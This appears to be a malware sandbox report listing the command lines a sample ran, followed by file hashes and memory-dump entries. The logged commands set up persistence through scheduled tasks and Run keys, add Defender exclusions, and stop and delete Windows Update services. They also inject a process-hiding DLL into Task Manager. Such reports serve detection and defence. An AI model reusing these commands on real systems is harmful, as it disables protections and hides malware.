C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC

C:\Program Files\Notepad\Chrome\updater.exe

"C:\Program Files\Notepad\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe zuhwtyqtfkk

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Name, VideoProcessor

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe ozascextlcafxrlv

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Roaming\ugrceei

C:\Users\Admin\AppData\Roaming\ugrceei

C:\Users\Admin\AppData\Roaming\ugrceei

C:\Users\Admin\AppData\Roaming\ugrceei

Network


Files


memory/2396-507-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/2396-517-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/628-518-0x00007FF7A8F60000-0x00007FF7A931D000-memory.dmp

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/3404-526-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2396-528-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/2396-533-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2396-537-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1660-563-0x0000000000400000-0x00000000008DF000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 bdb25c22d14ec917e30faf353826c5de
SHA1 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512 b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b42c70c1dbf0d1d477ec86902db9e986
SHA1 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA256 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA512 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

C:\Program Files\Notepad\Chrome\updater.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Program Files\Google\Libs\g.log

MD5 fdba80d4081c28c65e32fff246dc46cb
SHA1 74f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256 b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512 b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

memory/628-604-0x00007FF7A8F60000-0x00007FF7A931D000-memory.dmp

memory/4016-605-0x00000208C2390000-0x00000208C23B0000-memory.dmp

memory/2396-607-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/4916-611-0x00007FF65AA10000-0x00007FF65AA26000-memory.dmp

memory/4016-612-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp

memory/2396-613-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/4016-617-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp

memory/2396-618-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1660-620-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/4016-623-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp

memory/2396-624-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

memory/2396-632-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1660-633-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/4016-636-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Roaming\ugrceei

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

MD5 09031a062610d77d685c9934318b4170
SHA1 880f744184e7774f3d14c1bb857e21cc7fe89a6d
SHA256 778bd69af403df3c4e074c31b3850d71bf0e64524bea4272a802ca9520b379dd
SHA512 9a276e1f0f55d35f2bf38eb093464f7065bdd30a660e6d1c62eed5e76d1fb2201567b89d9ae65d2d89dc99b142159e36fb73be8d5e08252a975d50544a7cda27